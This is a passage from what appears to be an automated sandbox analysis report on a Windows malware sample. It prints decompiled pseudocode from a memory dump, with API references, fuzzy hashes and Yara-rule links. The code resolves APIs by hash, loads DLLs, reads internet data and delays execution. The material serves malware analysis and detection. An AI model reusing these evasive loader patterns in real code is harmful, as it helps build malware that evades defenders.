											continue;
										} else {
											goto L85;
										}
										goto L91;
									}
									_t394 =  *((intOrPtr*)(_t395 + _t342 + 0x14));
									if(_t394 != 0) {
										L89:
										if(_t394 != 0) {
											 *_t394( *(_t426 + 0x26c),  *(_t426 + 0x26c) >> 1);
										}
									} else {
										goto L86;
									}
									goto L91;
									L85:
									asm("o16 nop [eax+eax]");
									_t109 = _t342 + 0x180; // 0x2498fa8
									_t342 =  *_t109;
								} while (_t342 != 0);
								goto L86;
							}
						}
						L91:
						if(( *(E00419DE0(_t426 + 0x268)) & 0x0000ffff) != 0x5c) {
							E004196D0(_t426 + 0x26c, 0x5c);
						}
						_t345 =  *0x43b208; // 0x24974f0
						E00418CC0(_t345 + 0x38,  *((intOrPtr*)(_t426 + 0x268)));
						E00418CA0(_t426 + 0x268);
					}
					_t138 =  *0x43b208; // 0x24974f0
					E004188C0(_t426 + 0x274, _t138 + 0x38);
					E00418CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x270)));
					_t291 = _t426 + 0x270;
				} else {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t422 = E00411030();
						_t426 = _t426 + 4;
						if(_t422 == 0) {
							_t422 = 0;
						} else {
							_t95 = _t422 + 8; // 0x8
							 *_t422 = 0;
							 *((intOrPtr*)(_t422 + 4)) = 0;
							E00418810(_t95, 0);
							_t97 = _t422 + 0x10; // 0x10
							E00418810(_t97, 0);
							_t98 = _t422 + 0x18; // 0x18
							E00418810(_t98, 0);
							_t99 = _t422 + 0x20; // 0x20
							E00418810(_t99, 0);
							_t100 = _t422 + 0x28; // 0x28
							E00418810(_t100, 0);
							_t101 = _t422 + 0x30; // 0x30
							E00418810(_t101, 0);
							_t102 = _t422 + 0x38; // 0x38
							E00418810(_t102, 0);
							_t103 = _t422 + 0x40; // 0x40
							E00418810(_t103, 0);
							_t104 = _t422 + 0x48; // 0x48
							E00418810(_t104, 0);
							_t411 = 6;
							_t105 = _t422 + 0x50; // 0x50
							_t405 = _t105;
							do {
								E00418810(_t405, 0);
								_t405 = _t405 + 8;
								_t411 = _t411 - 1;
							} while (_t411 != 0);
						}
						 *0x43b208 = _t422;
					}
					if(E00419DC0(_t422 + 0x30) != 0) {
						E00418810(_t426 + 0x27c, 0x80);
						_t363 =  *0x43b1f4; // 0x2491340
						if(_t363 == 0xc139578) {
							 *0x43b1f4 = 0;
							goto L10;
						} else {
							if(_t363 == 0) {
								L10:
								_push(0xa1310f65);
								_t424 = E00417564(0xa1310f65);
								if(_t424 == 0) {
									if(E00416C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t424 = E00417564(0xa1310f65);
									}
								}
								if(_t424 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t397 = E004167C8(_t424, 0x4ade4070);
									goto L13;
								}
							} else {
								do {
									_t425 = 0;
									_t398 = 0;
									while( *((intOrPtr*)(_t398 + _t363 + 8)) != 0x4ade4070) {
										_t425 = _t425 + 1;
										_t398 = _t398 + 0x18;
										if(_t425 < 0x10) {
											continue;
										} else {
											goto L9;
										}
										goto L15;
									}
									_t397 =  *((intOrPtr*)(_t398 + _t363 + 0x14));
									if(_t397 != 0) {
										L13:
										if(_t397 != 0) {
											 *_t397( *(_t426 + 0x27c),  *(_t426 + 0x27c) >> 1);
										}
										goto L15;
									} else {
										goto L10;
									}
									L106:
									L9:
									asm("o16 nop [eax+eax]");
									_t7 = _t363 + 0x180; // 0x2498fa8
									_t363 =  *_t7;
								} while (_t363 != 0);
								goto L10;
							}
						}
						L15:
						if(( *(E00419DE0(_t426 + 0x278)) & 0x0000ffff) != 0x5c) {
							E004196D0(_t426 + 0x27c, 0x5c);
						}
						_t366 =  *0x43b208; // 0x24974f0
						E00418CC0(_t366 + 0x30,  *((intOrPtr*)(_t426 + 0x278)));
						E00418CA0(_t426 + 0x278);
					}
					_t246 =  *0x43b208; // 0x24974f0
					E004188C0(_t426 + 0x2c0, _t246 + 0x30);
					E00418CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x2bc)));
					_t291 = _t426 + 0x2bc;
				}
				E00418CA0(_t291);
				_t143 = E00420220(_t426 + 0x2d4,  *((intOrPtr*)(_t426 + 0x2c8)), 0);
				E00418810(_t426 + 0x2d8, 0x2800);
				_t407 =  *((intOrPtr*)(_t426 + 0x2d4));
				 *_t407 = 0;
				E00429470(_t426 + 0x2ac, 0x43a1a0, 0x28);
				_t147 = E00429640(_t426 + 0x2a8, 0);
				E0042E780(_t278, _t147, E00429650(_t426 + 0x2a4));
				 *((intOrPtr*)(_t426 + 0x294)) = _t407;
				 *((char*)(_t426 + 0x290)) = 0;
				 *((intOrPtr*)(_t426 + 0x298)) = 0;
				 *((intOrPtr*)(_t426 + 0x29c)) = 2;
				 *((char*)(_t426 + 0x2a0)) = 1;
				_t151 = E00429640(_t426 + 0x2a8, 0);
				_push(_t426 + 0x290);
				_push(E00417CD0);
				_push(0);
				_push(0x7fffffff);
				_push(0x43a1c8);
				E0042E5D0(_t151, 0x28, _t407);
				E00429510(_t426 + 0x2a4);
				E00420220(_t143,  *((intOrPtr*)(_t426 + 0x2d8)), 0);
				E00418CA0(_t426 + 0x2d4);
				 *_t426 = 0;
				 *(_t426 + 4) = 1;
				 *((intOrPtr*)(_t426 + 8)) = 0;
				 *((intOrPtr*)(_t426 + 0xc)) = 3;
				E00418AB0(_t426 + 0x18,  *((intOrPtr*)(_t426 + 0x2d0)), 0);
				_push(1);
				if(E0042CEA0(_t278, _t426 + 4, 0x28, _t143, _t407) == 0) {
					L53:
					E00418CA0(_t426 + 0x10);
					if( *(_t426 + 4) != 0) {
						_t382 =  *_t426;
						if(_t382 == 0 || _t382 == 0xffffffff) {
							_t164 = 1;
						} else {
							_t164 = 0;
						}
						if(_t164 == 0) {
							E0042CE70(_t382);
						}
					}
					 *_t426 = 0;
					E00418CA0(_t426 + 0x2cc);
					E00418CA0(_t426 + 0x2c4);
					return 0;
				} else {
					_t279 = _t278 ^ 0x38ba5c7b;
					_t408 = _t426 + 0x44;
					_t401 = _t426 + 0x2e8;
					while(1) {
						E00418AB0(_t426 + 0x2e8, _t408, 0);
						E00419E70(_t426 + 0x2e4, _t401);
						E004183B0(_t426 + 0x2f0);
						_t170 = E0042D620( *((intOrPtr*)(_t426 + 0x2f0)), E00426040( *((intOrPtr*)(_t426 + 0x2f0)), 0x7fffffff));
						E00420B10(_t426 + 0x2f0);
						if(_t279 == _t170) {
							break;
						}
						E00418CA0(_t401);
						E00418CA0(_t426 + 0x2e0);
						if(E0042D0E0(_t426) != 0) {
							continue;
						} else {
							goto L53;
						}
						goto L106;
					}
					E00418CA0(_t401);
					E004188C0(_t426 + 0x2b8, _t426 + 0x2c4);
					E00420220(_t426 + 0x2bc,  *((intOrPtr*)(_t426 + 0x2e4)), 0);
					_t409 =  *((intOrPtr*)(_t426 + 0x2b4));
					_push(E00420180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff,  *((intOrPtr*)(_t426 + 0x2b4))) + _t179 + 0xa);
					E00429350(_t426 + 0x284);
					_t418 = E00429640(_t426 + 0x284, 0);
					_t183 = E00429640(_t426 + 0x284, 8);
					_t402 = E00420180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff, _t409);
					 *((intOrPtr*)(_t418 + 4)) = _t183;
					 *_t418 = _t402 + _t402;
					 *((short*)(_t418 + 2)) = _t402 + _t402 + 2;
					E004201B0(_t183, _t409, _t402 + _t402 + 2, _t409, 0);
					_t389 =  *0x43b1f4; // 0x2491340
					 *(_t426 + 0x2dc) = 0;
					if(_t389 == 0xc139578) {
						 *0x43b1f4 = 0;
						goto L29;
					} else {
						if(_t389 == 0) {
							L29:
							_push(0x588ab3ea);
							_t281 = E00417564(0x588ab3ea);
							if(_t281 == 0) {
								if(E00416C50(0x588ab3ea) != 0) {
									_push(0x588ab3ea);
									_t281 = E00417564(0x588ab3ea);
								}
							}
							if(_t281 == 0) {
								goto L43;
							} else {
								_t426 = _t426 + 0xfffffff8;
								_t282 = E004167C8(_t281, 0x208c2589);
								goto L32;
							}
						} else {
							do {
								_t340 = 0;
								_t215 = 0;
								while( *((intOrPtr*)(_t215 + _t389 + 8)) != 0x208c2589) {
									_t340 = _t340 + 1;
									_t215 = _t215 + 0x18;
									if(_t340 < 0x10) {
										continue;
									} else {
										goto L28;
									}
									goto L106;
								}
								_t282 =  *((intOrPtr*)(_t215 + _t389 + 0x14));
								if(_t282 != 0) {
									L32:
									if(_t282 == 0) {
										L43:
										if( *(_t426 + 0x2dc) == 0) {
											goto L35;
										} else {
											goto L44;
										}
									} else {
										_t212 = LdrLoadDll(0, 0, E00429640(_t426 + 0x284, 0), _t426 + 0x2dc); // executed
										if( *(_t426 + 0x2dc) == 0 || _t212 != 0) {
											L35:
											E00429510(_t426 + 0x280);
											E00418CA0(_t426 + 0x2b4);
											E00418CA0(_t426 + 0x2e0);
											E00418CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t390 =  *_t426;
												if(_t390 == 0 || _t390 == 0xffffffff) {
													_t197 = 1;
												} else {
													_t197 = 0;
												}
												if(_t197 == 0) {
													E0042CE70(_t390);
												}
											}
											 *_t426 = 0;
											E00418CA0(_t426 + 0x2cc);
											E00418CA0(_t426 + 0x2c4);
											return 0;
										} else {
											L44:
											E00429510(_t426 + 0x280);
											E00418CA0(_t426 + 0x2b4);
											E00418CA0(_t426 + 0x2e0);
											E00418CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t391 =  *_t426;
												if(_t391 == 0 || _t391 == 0xffffffff) {
													_t206 = 1;
												} else {
													_t206 = 0;
												}
												if(_t206 == 0) {
													E0042CE70(_t391);
												}
											}
											 *_t426 = 0;
											E00418CA0(_t426 + 0x2cc);
											E00418CA0(_t426 + 0x2c4);
											return 1;
										}
									}
								} else {
									goto L29;
								}
								goto L106;
								L28:
								asm("o16 nop [eax+eax]");
								_t67 = _t389 + 0x180; // 0x2498fa8
								_t389 =  *_t67;
							} while (_t389 != 0);
							goto L29;
						}
					}
				}
				goto L106;
			}

0x00416c5a
0x00416c65
0x00416c73
0x00416c7a
0x00416c7f
0x00416c89
0x0041735c
0x004174c4
0x004174ce
0x004174d0
0x004174d5
0x00417551
0x004174d7
0x004174d9
0x004174dd
0x004174e0
0x004174e3
0x004174ea
0x004174ed
0x004174f4
0x004174f7
0x004174fe
0x00417501
0x00417508
0x0041750b
0x00417512
0x00417515
0x0041751c
0x0041751f
0x00417526
0x00417529
0x00417530
0x00417533
0x00417538
0x0041753d
0x0041753d
0x00417540
0x00417544
0x00417549
0x0041754c
0x0041754c
0x0041754f
0x00417553
0x00417553
0x0041736e
0x00417380
0x00417385
0x00417391
0x004174b5
0x00000000
0x00417397
0x00417399
0x004173c8
0x004173cd
0x004173d3
0x004173d7
0x0041748c
0x00417497
0x0041749d
0x0041749d
0x0041748c
0x004173df
0x004173e8
0x004173f0
0x00000000
0x004173f0
0x0041739b
0x0041739d
0x0041739d
0x0041739f
0x004173a1
0x004173af
0x004173b0
0x004173b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004173b6
0x004174a4
0x004174aa
0x004173f2
0x004173f4
0x00417407
0x00417407
0x004174b0
0x00000000
0x004174b0
0x00000000
0x004173b8
0x004173b8
0x004173be
0x004173be
0x004173c4
0x00000000
0x0041739d
0x00417399
0x00417409
0x0041741b
0x00417426
0x00417426
0x0041742b
0x0041743b
0x00417447
0x00417447
0x0041744c
0x0041745c
0x0041746f
0x00417474
0x00416c8f
0x00416c95
0x004172bc
0x004172c6
0x004172c8
0x004172cd
0x00417349
0x004172cf
0x004172d1
0x004172d5
0x004172d8
0x004172db
0x004172e2
0x004172e5
0x004172ec
0x004172ef
0x004172f6
0x004172f9
0x00417300
0x00417303
0x0041730a
0x0041730d
0x00417314
0x00417317
0x0041731e
0x00417321
0x00417328
0x0041732b
0x00417330
0x00417335
0x00417335
0x00417338
0x0041733c
0x00417341
0x00417344
0x00417344
0x00417347
0x0041734b
0x0041734b
0x00416ca7
0x00416cb9
0x00416cbe
0x00416cca
0x004172ad
0x00000000
0x00416cd0
0x00416cd2
0x00416d01
0x00416d06
0x00416d0c
0x00416d10
0x00417284
0x0041728f
0x00417295
0x00417295
0x00417284
0x00416d18
0x00416d21
0x00416d29
0x00000000
0x00416d29
0x00416cd4
0x00416cd6
0x00416cd6
0x00416cd8
0x00416cda
0x00416ce8
0x00416ce9
0x00416cef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00416cef
0x0041729c
0x004172a2
0x00416d2b
0x00416d2d
0x00416d40
0x00416d40
0x00000000
0x004172a8
0x00000000
0x004172a8
0x00000000
0x00416cf1
0x00416cf1
0x00416cf7
0x00416cf7
0x00416cfd
0x00000000
0x00416cd6
0x00416cd2
0x00416d42
0x00416d54
0x00416d5f
0x00416d5f
0x00416d64
0x00416d74
0x00416d80
0x00416d80
0x00416d85
0x00416d95
0x00416da8
0x00416dad
0x00416dad
0x00416db4
0x00416dc9
0x00416ddc
0x00416de1
0x00416df1
0x00416dfb
0x00416e09
0x00416e20
0x00416e27
0x00416e2e
0x00416e35
0x00416e3c
0x00416e47
0x00416e57
0x00416e6a
0x00416e6b
0x00416e70
0x00416e72
0x00416e77
0x00416e7c
0x00416e88
0x00416e98
0x00416ea4
0x00416eab
0x00416eae
0x00416eb3
0x00416eb7
0x00416ecb
0x00416ed0
0x00416edd
0x004171d9
0x004171dd
0x004171e7
0x004171e9
0x004171ee
0x004171f9
0x004171f5
0x004171f5
0x004171f5
0x00417200
0x00417203
0x00417203
0x00417200
0x00417208
0x00417216
0x00417222
0x00417233
0x00416ee3
0x00416ee3
0x00416ee9
0x00416eed
0x00416ef4
0x00416efe
0x00416f0b
0x00416f1e
0x00416f3a
0x00416f48
0x00416f4f
0x00000000
0x00000000
0x004171b8
0x004171c4
0x004171d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004171d3
0x00416f57
0x00416f6b
0x00416f80
0x00416f85
0x00416f9c
0x00416fa4
0x00416fb7
0x00416fc2
0x00416fd5
0x00416fdd
0x00416fe3
0x00416feb
0x00416fef
0x00416ff4
0x00416ffa
0x0041700b
0x00417269
0x00000000
0x00417011
0x00417013
0x00417042
0x00417047
0x0041704d
0x00417051
0x00417240
0x0041724b
0x00417251
0x00417251
0x00417240
0x00417059
0x00000000
0x0041705f
0x00417066
0x0041706e
0x00000000
0x0041706e
0x00417015
0x00417017
0x00417017
0x00417019
0x0041701b
0x00417029
0x0041702a
0x00417030
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417030
0x00417258
0x0041725e
0x00417070
0x00417072
0x00417126
0x0041712e
0x00000000
0x00000000
0x00000000
0x00000000
0x00417078
0x00417093
0x0041709d
0x004170a7
0x004170ae
0x004170ba
0x004170c6
0x004170cf
0x004170d9
0x004170db
0x004170e0
0x004170eb
0x004170e7
0x004170e7
0x004170e7
0x004170f2
0x004170f5
0x004170f5
0x004170f2
0x004170fa
0x00417108
0x00417114
0x00417125
0x00417134
0x00417134
0x0041713b
0x00417147
0x00417153
0x0041715c
0x00417166
0x00417168
0x0041716d
0x00417178
0x00417174
0x00417174
0x00417174
0x0041717f
0x00417182
0x00417182
0x0041717f
0x00417187
0x00417195
0x004171a1
0x004171b5
0x004171b5
0x0041709d
0x00417264
0x00000000
0x00417264
0x00000000
0x00417032
0x00417032
0x00417038
0x00417038
0x0041703e
0x00000000
0x00417017
0x00417013
0x0041700b
0x00000000

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000000,?,00000000), ref: 00417093

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 15bbabd773bba3cc029a5e840635775b800f62c5e370a44fb604da2a31d4ae94
Instruction ID: 76819b10694f7534be2198f2178da23ba872a02a1877183b0a46430fbce829d6
Opcode Fuzzy Hash: 15bbabd773bba3cc029a5e840635775b800f62c5e370a44fb604da2a31d4ae94
Instruction Fuzzy Hash: F422C2302083459BD724FB25DC95BEF73A5AF90308F50892FA449872D2EF789D85C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004339F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004339F9(void* __eax, signed int __ebx, void* __edi) {
				long _t42;
				void* _t60;
				long _t63;
				long _t64;
				void* _t79;
				void* _t81;
				signed int _t86;
				void* _t124;
				void* _t128;
				void* _t133;
				long* _t134;
				void* _t139;

				_t124 = __edi;
				_t86 = __ebx;
				if(__eax == 0) {
					_t42 = E00417F00();
					__eflags = _t42;
					if(_t42 != 0) {
						 *_t134 = _t42;
						E00418CA0(_t139 + 0x34);
						E00418CA0(_t139 + 0x44);
						goto L14;
					} else {
						goto L1;
					}
				} else {
					L1:
					E004183B0(_t139 + 0x2c);
					E00420B30(_t139 + 0x40,  *((intOrPtr*)(_t139 + 0x34)),  *((intOrPtr*)(_t139 + 0x2c)));
					E00420B10(_t139 + 0x2c);
					_t130 = _t139;
					E004250A0(_t139 + 0x44, _t139, 0x439424);
					E00423B00(_t86, _t130);
					E00427560(_t130, _t124, _t130);
					 *((char*)( *((intOrPtr*)(E00427600(_t86, 0))))) = 0;
					_t143 = _t134[0xa] - 1;
					if(_t134[0xa] > 1) {
						 *(_t139 + 0xc) = _t134;
						_t128 = 1;
						_t133 = _t139 + 0x54;
						while(1) {
							_t79 = E00427600(_t86, _t128);
							_push(1);
							_push( &E0043A9E0);
							E00411BA0(_t143, _t133);
							_t81 = E00420ED0(_t79, _t128,  *((intOrPtr*)(_t139 + 0x54)));
							E00420B10(_t133);
							if(_t81 != 0) {
								break;
							}
							_t128 = _t128 + 1;
							if(_t128 <  *_t86) {
								continue;
							} else {
								_t134 =  *(_t139 + 0xc);
							}
							goto L6;
						}
						_t134 =  *(_t139 + 0xc);
						 *((char*)( *((intOrPtr*)(E00427600(_t86, _t128))))) = 0;
					}
					L6:
					E00423EC0(_t86);
					_push(0);
					E00429350(_t139 + 0x10);
					_push(0x2800);
					E00429350(_t139 + 0x20);
					while(1) {
						 *(_t139 + 0x5c) = 0;
						if(E004115C0(0xd27f045a, 0x547ac48e) == 0) {
							break;
						}
						_t60 = E00429640(_t139 + 0x20, 0);
						_t63 = InternetReadFile(_t134[4], _t60, E00429650(_t139 + 0x1c), _t139 + 0x5c); // executed
						__eflags = _t63;
						if(_t63 == 0) {
							_t64 = E00417F00();
							__eflags = _t64;
							if(_t64 != 0) {
								L9:
								 *_t134 = _t64;
								E00429510(_t139 + 0x1c);
								E00429510(_t139 + 0xc);
								E00418CA0(_t139 + 0x34);
								E00418CA0(_t139 + 0x44);
								L14:
								E00420B10(_t139 + 0x3c);
								_push(0);
								E00429350( *((intOrPtr*)(_t139 + 0x78)));
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								goto L11;
							}
						} else {
							L11:
							__eflags =  *(_t139 + 0x5c);
							if( *(_t139 + 0x5c) == 0) {
								_push(_t139 + 0xc);
								E004293D0( *((intOrPtr*)(_t139 + 0x78)));
								E00429510(_t139 + 0x1c);
								E00429510(_t139 + 0xc);
								E00418CA0(_t139 + 0x34);
								E00418CA0(_t139 + 0x44);
								E00420B10(_t139 + 0x3c);
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								E00429710(_t139 + 0x14, E00429640(_t139 + 0x20, 0),  *(_t139 + 0x5c));
								continue;
							}
						}
						goto L22;
					}
					_t64 = 0x7f;
					goto L9;
				}
				L22:
			}

0x004339f9
0x004339f9
0x004339fb
0x00433c44
0x00433c49
0x00433c4b
0x00433b6d
0x00433b74
0x00433b7d
0x00000000
0x00433c51
0x00000000
0x00433c51
0x00433a01
0x00433a01
0x00433a09
0x00433a16
0x00433a1f
0x00433a24
0x00433a31
0x00433a39
0x00433a40
0x00433a50
0x00433a53
0x00433a57
0x00433a59
0x00433a5d
0x00433a62
0x00433a66
0x00433a69
0x00433a70
0x00433a72
0x00433a78
0x00433a83
0x00433a8c
0x00433a95
0x00000000
0x00000000
0x00433a9b
0x00433a9e
0x00000000
0x00433aa0
0x00433aa0
0x00433aa0
0x00000000
0x00433a9e
0x00433c30
0x00433c3c
0x00433c3c
0x00433aa4
0x00433aa6
0x00433aab
0x00433ab1
0x00433ab6
0x00433abf
0x00433ac4
0x00433ac4
0x00433adf
0x00000000
0x00000000
0x00433b1b
0x00433b35
0x00433b37
0x00433b39
0x00433c1c
0x00433c21
0x00433c23
0x00433ae6
0x00433ae6
0x00433aed
0x00433af6
0x00433aff
0x00433b08
0x00433bb1
0x00433bb5
0x00433bba
0x00433bc0
0x00433bd0
0x00433c29
0x00000000
0x00433c29
0x00433b3f
0x00433b3f
0x00433b3f
0x00433b44
0x00433bd7
0x00433bdc
0x00433be5
0x00433bee
0x00433bf7
0x00433c00
0x00433c09
0x00433c19
0x00433b4a
0x00433b5e
0x00000000
0x00433b5e
0x00433b44
0x00000000
0x00433b39
0x00433ae1
0x00000000
0x00433ae1
0x00000000

APIs

InternetReadFile.WININET(?,00000000,00000000,00000000,00000000,D27F045A,547AC48E), ref: 00433B35

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 2e3d049f217850b06ff4950c17a1d0d5ea1dbac1bbbeac37f2c6be68d84a2dd4
Instruction ID: 6a7572d38a8db37f2e423d0f33ad35997a8cb27007f7353e363c1f4468ce7815
Opcode Fuzzy Hash: 2e3d049f217850b06ff4950c17a1d0d5ea1dbac1bbbeac37f2c6be68d84a2dd4
Instruction Fuzzy Hash: EF5181313082149FD704FF21D852AAFB3A4AF94748F90482EF59557192EF38AE45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004122A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004122A0(void* __ecx, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v24;
				intOrPtr* _t10;
				void* _t13;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t23;
				intOrPtr* _t24;

				_t19 = __edx;
				_t24 =  &_v8;
				if(__ecx == 0) {
					 *_t24 = 0;
					_v8 = 0;
				} else {
					 *_t24 = E00411230(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v24 = _t19;
				}
				_t20 =  *0x43b1f4; // 0x2491340
				if(_t20 == 0xc139578) {
					 *0x43b1f4 = 0;
					_t20 = 0;
				}
				if(_t20 == 0) {
					L10:
					_push(0x588ab3ea);
					_t10 = E00417564(0x588ab3ea);
					_t23 = _t10;
					if(_t23 == 0) {
						_t10 = E00416C50(0x588ab3ea);
						if(_t10 != 0) {
							_push(0x588ab3ea);
							_t10 = E00417564(0x588ab3ea);
							_t23 = _t10;
						}
					}
					if(_t23 == 0) {
						goto L15;
					} else {
						_t24 = _t24 + 0xfffffff8;
						_t10 = E004167C8(_t23, 0xcd123e03);
						_t22 = _t10;
						goto L13;
					}
				} else {
					do {
						_t18 = 0;
						_t10 = 0;
						while( *((intOrPtr*)(_t10 + _t20 + 8)) != 0xcd123e03) {
							_t18 = _t18 + 1;
							_t10 = _t10 + 0x18;
							if(_t18 < 0x10) {
								continue;
							}
							goto L9;
						}
						_t22 =  *((intOrPtr*)(_t10 + _t20 + 0x14));
						if(_t22 != 0) {
							L13:
							if(_t22 == 0) {
								L15:
								return _t10;
							}
							_t13 =  *_t22(0, _t24); // executed
							return _t13;
						}
						goto L10;
						L9:
						asm("o16 nop [eax+eax]");
						_t5 = _t20 + 0x180; // 0x2498fa8
						_t20 =  *_t5;
					} while (_t20 != 0);
					goto L10;
				}
			}

0x004122a0
0x004122a1
0x004122a6
0x004122c2
0x004122c5
0x004122a8
0x004122b7
0x004122ba
0x004122ba
0x004122c9
0x004122d5
0x004122d7
0x004122e1
0x004122e1
0x004122e5
0x0041230e
0x00412313
0x00412314
0x00412319
0x0041231d
0x0041234a
0x00412351
0x00412358
0x00412359
0x0041235e
0x0041235e
0x00412351
0x00412321
0x00000000
0x00412323
0x0041232a
0x0041232d
0x00412332
0x00000000
0x00412332
0x004122e7
0x004122e7
0x004122e7
0x004122e9
0x004122eb
0x004122f5
0x004122f6
0x004122fc
0x00000000
0x00000000
0x00000000
0x004122fc
0x00412362
0x00412368
0x00412334
0x00412336
0x00412344
0x00412344
0x00412344
0x0041233e
0x00000000
0x0041233e
0x00000000
0x004122fe
0x004122fe
0x00412304
0x00412304
0x0041230a
0x00000000
0x004122e7

APIs

NtDelayExecution.NTDLL(00000000,00000000), ref: 0041233E

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e0f36ea2bb239904f9f672526366afb6b59d0eb3ec182fddddeb63bb9ef88633
Instruction ID: 28cce750f74efba5a796f473e3839af0f3c265a491ff96ed7cc08f9387237881
Opcode Fuzzy Hash: e0f36ea2bb239904f9f672526366afb6b59d0eb3ec182fddddeb63bb9ef88633
Instruction Fuzzy Hash: B6112930B086024BD628A7398E407AF71D6AF80714F29C26FDC11DB385EA7CCCD182AD

Uniqueness

Uniqueness Score: -1.00%

Function 00417A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00417A60(intOrPtr* __ecx) {
				void* _t1;

				_push(E00417D40);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x00417a60
0x00417a65
0x00417a67
0x00417a69

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,00417D40,00417A11,588AB3EA,?,?,00409DA1,00000000), ref: 00417A67

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 4329d034f73a4514cff619d5219045789892739ba2f3ade8172028fa0b9e6be6
Instruction ID: dae2e92e3a3a730536c297aab630ce179e6d568c655e3e93561c1dd8cb3e4d4e
Opcode Fuzzy Hash: 4329d034f73a4514cff619d5219045789892739ba2f3ade8172028fa0b9e6be6
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004167C8, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80647ecfda45d7924c1bc9e141240614a1bebd6c00263cdada926b6be3082302
Instruction ID: 7e7f9307a5ee1dd912292536a3e36ab3164d3d84d1ed558fa943790ae18f1e9d
Opcode Fuzzy Hash: 80647ecfda45d7924c1bc9e141240614a1bebd6c00263cdada926b6be3082302
Instruction Fuzzy Hash: 27C1B0706083458BD730EF55D4907AB77E1BF84348F15C52ED9898B342EB78D886CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004147B0, Relevance: 3.6, APIs: 2, Instructions: 618
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004147B0(void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t93;
				long _t99;
				void* _t109;
				int _t112;
				intOrPtr _t118;
				char _t133;
				intOrPtr _t141;
				void* _t144;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t155;
				void* _t158;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t169;
				int _t174;
				intOrPtr _t179;
				void* _t182;
				void* _t185;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				void* _t206;
				long _t207;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t243;
				void* _t245;
				long _t246;
				intOrPtr* _t248;
				long _t249;
				long _t250;
				long _t253;
				long _t255;
				long _t258;
				long _t259;
				long _t261;
				intOrPtr _t266;
				long _t267;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr* _t273;
				intOrPtr _t277;
				intOrPtr* _t278;
				void* _t281;
				signed int _t283;
				void* _t284;
				void* _t285;

				_t272 = __esi;
				_t270 = __edi;
				_t285 = _t284 - 0x38;
				_t246 =  *0x43b1f4; // 0x2491340
				 *(_t285 + 0x34) = 0;
				if(_t246 == 0xc139578) {
					 *0x43b1f4 = 0;
					goto L6;
				} else {
					if(_t246 == 0) {
						L6:
						_push(0x3ab94787);
						_t196 = E00417564(0x3ab94787);
						if(_t196 == 0) {
							if(E00416C50(0x3ab94787) != 0) {
								_push(0x3ab94787);
								_t196 = E00417564(0x3ab94787);
							}
						}
						if(_t196 == 0) {
							goto L25;
						} else {
							_t285 = _t285 + 0xfffffff8;
							_t248 = E004167C8(_t196, 0xc17c5a6e);
							goto L9;
						}
					} else {
						do {
							_t245 = 0;
							_t194 = 0;
							while( *((intOrPtr*)(_t194 + _t246 + 8)) != 0xc17c5a6e) {
								_t245 = _t245 + 1;
								_t194 = _t194 + 0x18;
								if(_t245 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L186;
							}
							_t248 =  *((intOrPtr*)(_t194 + _t246 + 0x14));
							if(_t248 != 0) {
								L9:
								if(_t248 == 0) {
									L25:
									return 0;
								} else {
									_push(_t285 + 0x34);
									_push(8);
